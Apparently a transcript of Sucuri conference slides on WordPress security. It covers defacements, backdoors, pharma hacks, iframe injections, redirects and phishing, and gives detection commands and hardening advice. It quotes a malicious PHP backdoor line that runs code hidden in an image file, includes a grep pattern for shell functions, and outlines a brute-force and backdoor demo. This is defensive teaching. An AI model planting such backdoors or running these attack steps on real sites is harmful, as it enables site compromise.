wordpress security - dealing with today's hacks
TRANSCRIPT
WordPress SecurityDealing with Today’s Hacks
04/11/2023@sucuri_security @perezbox #wclv
SUCURI@WORDCAMP# WHOIS PEREZBOX
ID: Tony Perez
WHO: The Hulk
Username: Perezbox
Process: Sucuri
Services: InfoSec, Harley’s, MMA, Guns
GeoIP: Menifee, California
04/11/2023@sucuri_security @perezbox #wclv
04/11/2023@sucuri_security @perezbox #wclv
Why listen to me? You don’t have to, but…
I am not a designer or developer, my passion is Information Security, specifically Web Security
Not an expert, passionate enthusiast
I don’t like people, I like packets, signatures and terminal.
Seriously though, our company:Remediate 200 – 300 infected websites a day,
24/7/365
Perform 2 million + malware website scans a month
Support all CMS platforms and customapplications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc… )
04/11/2023@sucuri_security @perezbox #wclv
Thoughts To Kick Things Off
Information Security is about risk reduction.
If you’re looking for the “silver bullet” this is the wrong talk for you.
To think that you will never be infected or that you are immune to hacks is like saying you will never be sick.
If someone tells you the opposite you should slap them and have them pay you for wasting your time.
Prevention is ideal, detection is key… bats were created for ________ people…
04/11/2023@sucuri_security @perezbox #wclv
Know Your EnemyThey have more time and resources
They are intelligent
Majority of attacks are automated
Goal is to impact as many people as possible
Mindset – Own one, own them all…
It’s not personal, it’s business…
04/11/2023@sucuri_security @perezbox #wclv
Ok, so what’s the problem?
TODAY’s ISSUES:
The Ecosystem / Environment
Access Control
Software Vulnerabilities
Administration
Credential Management
Extensibility
04/11/2023@sucuri_security @perezbox #wclv
Today’s Focus
Ecosystem / Environment
Access Control
Dealing with Hacks
04/11/2023@sucuri_security @perezbox #wclv
The EcoSystem / Environment
ApacheMalicious module injects iFrames
http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/
phpMyAdminMirror Hacked
http://sourceforge.net/blog/phpmyadmin-back-door/
PHP-CGIRemote Code Execution
http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html
PleskVulnerable to SQLi attacks
http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html
04/11/2023@sucuri_security @perezbox #wclv
Uh, what about WordPress?
04/11/2023@sucuri_security @perezbox #wclv
Logical Architecture
Linux Operating System
Apache
WordPress CPANEL Plesk phpMyAdmin PHP-CGI
MySQL
Modules
PHP
Modules
04/11/2023@sucuri_security @perezbox #wclv
The EcoSystem / Environment
What can you do?Not much… completely outside of your control if you’re using a shared or managed host
But, you can reduce risk...Use a Dedicated / VPS Environment
But recognize the responsibility that this entails, if you what I mentioned previously doesn’t make sense, skip to next step
Go with a Managed HostDoesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on
04/11/2023@sucuri_security @perezbox #wclv
Access is Key
On the Server:Kill accounts that are not in use
FTP is the devil – slap yourself and switch to SFTP
Filter Shell / SFTP by IP & Keys, Keys at a minimum
Disable Authentication via Passwords on server
WordPress Admin:Multi-Factor Authentication on wp-admin
Apache “Basic Access Authentication”
Two-Factor Authentication on wp-login.phpDuo Two-Factor Authentication Plugin
Employ least privileged:Users with the “administrator” are not needed for every day tasks
Learn to use Editor, Author, Contributor, Subscriber
04/11/2023@sucuri_security @perezbox #wclv
Gah!?!?!?!?!?!?!
04/11/2023@sucuri_security @perezbox #wclv
WordPress Loving Infections
Defacements
Backdoors
Pharma Hack
InjectionsiFrame Specifically
Malicious Redirects
Phishing
04/11/2023@sucuri_security @perezbox #wclv
Before We Dive In
LINUX / UNIX:CURL
FIND
GREP
DIFF
04/11/2023@sucuri_security @perezbox #wclv
Command Usage – Hunting TimThumb
# grep -Eir --include "*thumb.php" 'define.*VERSION' .
- Then –
# curl -D - -A "Windows" http://timthumb.googlecode.com/svn/trunk/timthumb.php>/path-to-file/timthumb.php
04/11/2023@sucuri_security @perezbox #wclv
Command Usage – Identify Change
Detect Recent Changes
find -type f -ctime -0 | more - OR - find ./ -mtime -1
-ctime = -0 (past 24 hours) | -1 (last 24 hours)
-mtime = -1 (1 day) | -2 (2 days)
Detect Differences
diff –qr /path/dir1 /path/dir2
04/11/2023@sucuri_security @perezbox #wclv
DefacementsHacktivism at its finest… you now support a cause!?!?!
04/11/2023@sucuri_security @perezbox #wclv
Defacements
Hacktivism 101Annoying as S*&T
Places to look:Index.html
Index.phpRoot Directory
Wp-Content
Theme Directory
GREP is your friend:grep –ri ‘sniper399’ .
04/11/2023@sucuri_security @perezbox #wclv
BackdoorsIt’s ok to cry a little…
04/11/2023@sucuri_security @perezbox #wclv
BackdoorsCommon terms:
Is_bot
Eval
Base64_decode
Fopen
Fclose
readfile
Edoced_46esad
Exec
System
Shell_exec
Gzuncompress
popen
FilesMan
grep -RPl --include=*.{php} "(system|exec|passthru|shell_exec|base64_decode|eval|) *\(" /var/www
04/11/2023@sucuri_security @perezbox #wclv
Pharma HackErectile Dysfunction pills are leading ads.. Who knew..
04/11/2023@sucuri_security @perezbox #wclv
Pharma HackMulti-million $ Business
Rarely Distribute Malware
Impression based Affiliate Marketing
Google’s Search Engine Result Pages (SERP)
Odds of malware distribution are actually low
Tricks:Embedded within core files
Look for “.tmp” directories = >
04/11/2023@sucuri_security @perezbox #wclv
Pharma Hack, cntd..
Try using CURL to emulate Google and Windows:Curl –L –A “Googlebot/2.1(+http://www.google.com/bot.html)” http://someinfectedwebsite.com
Google Webmaster ToolsFetch as Google Bot
Check your Theme Index.php file for things like this:
<?php $wp__theme_icon=@create_function(”,@file_get_contents(‘/public_html/wp-content/themes/my-really-good-theme/images/s.jpg’));$wp__theme_icon(); ?>
04/11/2023@sucuri_security @perezbox #wclv
Pharma Hack, cntd..
04/11/2023@sucuri_security @perezbox #wclv
InjectionsIt only hurts for a minute…
04/11/2023@sucuri_security @perezbox #wclv
Injections
Invisible iFrame’s - Executing on your browser
Contributing to Drive-by-Downloads, Pharma, XSS, CSRF
Places to check – Pages that generate content:JS files, Header.php, Index.php, Function.php, Footer.php
04/11/2023@sucuri_security @perezbox #wclv
Injections, cntd…
PHP iFrame Injection =>Count##.php
Check all Index.php / Theme JS files
Example below:
04/11/2023@sucuri_security @perezbox #wclv
Injections, cntd…
Pharma Link Injections =>
Drive-By-Downloads
04/11/2023@sucuri_security @perezbox #wclv
Malicious RedirectsWTF?!?! Why don’t I understand what it says?
04/11/2023@sucuri_security @perezbox #wclv
Malicious RedirectsRedirects your user to a domain distributing malware, fundamentally different than an ifram injection that executes in your browser
8 out of 10 times, check your .htaccess file – all of them# find /var/www –name .htaccess –type f | wc –l
Check for backdoors also – often a sign of a bigger issue
04/11/2023@sucuri_security @perezbox #wclv
PhishingBiggest growing problem, exceptionally difficult to detect…
04/11/2023@sucuri_security @perezbox #wclv
Phishing
Growing at a faster pace than traditional web-malware
No impact to readers, but tied to SPAM bots sending out emails like this:
04/11/2023@sucuri_security @perezbox #wclv
Phishing, cntd…
04/11/2023@sucuri_security @perezbox #wclv
DemonstrationBringing the Point Home
04/11/2023@sucuri_security @perezbox #wclv
Demo Objective
Use good tools for bad things – wpscan
Enumerate the users
Brute Force the User accounts password
Insert an arbitrary Backdoor Shell for Remote Execution
Deface the Website
Insert another Shell Backdoor that provides an interface
I have 5 minutes – Ready?
04/11/2023@sucuri_security @perezbox #wclv
Keeping it RealRemember the risk discussion?
04/11/2023@sucuri_security @perezbox #wclv
Guard AccessRevisit Slide 12 – access, access, access
It always comes down to access
We have to change the way we treat and think about access. All access – Server / Application
We are going through the same mistakes servers and desktops were making in the 90’s with access.
Know where you are surfing the web, do you really need to log in as an admin at the coffee shop?
04/11/2023@sucuri_security @perezbox #wclv
Password Dilemma15 character pass
3 months to crack
Long / Complex / UniqueKey to Passwords
Prefer Password ManagerYou don’t? ok..
Passphrases work tooiLuvWCLVegas:2012:HrtAttckGrll
Come up with a process that works, stick to it:
One scheme:Remember 8 characters
Write Down 8 characters
Save 20 characters
Second scheme:Remember 20 characters
Prefix characters with site name
End sequence with some date
04/11/2023@sucuri_security @perezbox #wclv
Kill PHP Execution
Kill PHP Execution Directories:
WP-INCLUDES
WP-CONTENT
UPLOADS – At a minimum
<Files *.php>
Deny from all
</Files>
04/11/2023@sucuri_security @perezbox #wclv
Disable Theme / Plugin Editor
I’d take it a step further and remove the ability to install, but that’s just me.
Modify WP-CONFIG.PHP With:
Disable the Plugin / Theme EditorDefine(‘DISALLOW_FILE_EDIT’,true);
- OR -
Disable the Plugin / Theme Update and InstallationDefine(‘DISALLOW_FILE_MODS’,true);
04/11/2023@sucuri_security @perezbox #wclv
UpdateOldest version found in production – 1.5
Leading cause of cross-site contamination issues
Perhaps the simplest of tasks, yet we still find this:
04/11/2023@sucuri_security @perezbox #wclv
Plugins That HelpClients
Sucuri Security Premium
Duo Two-Factor Authentication
Theme-Check
BackupBuddy
Akismet
Non-Clients
Duo Two-Factor Authentication
Limit Login Attempts
Theme-Check
BackupBuddy
Akismet
04/11/2023@sucuri_security @perezbox #wclv
Sucuri Blog: http://blog.sucuri.net
SiteCheck Scanner: http://sitecheck.sucuri.net
Unmask Parasites: http://unmaskparasites.com
Perishable Press: http://perishablepress.com/category/web-design/security/
Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress
Hacked – http://wordpress.org/tags/hacked
Malware – http://wordpress.org/tags/malware
BadwareBusters – https://badwarebusters.org
Need a Hand?
Support Forums Online Resources
04/11/2023@sucuri_security @perezbox #wclv
Sucuri
Tony Perezhttp://sucuri.net |
http://blog.sucuri.net
Twitter:
@sucuri_security
@perezbox and @tonyonsecurity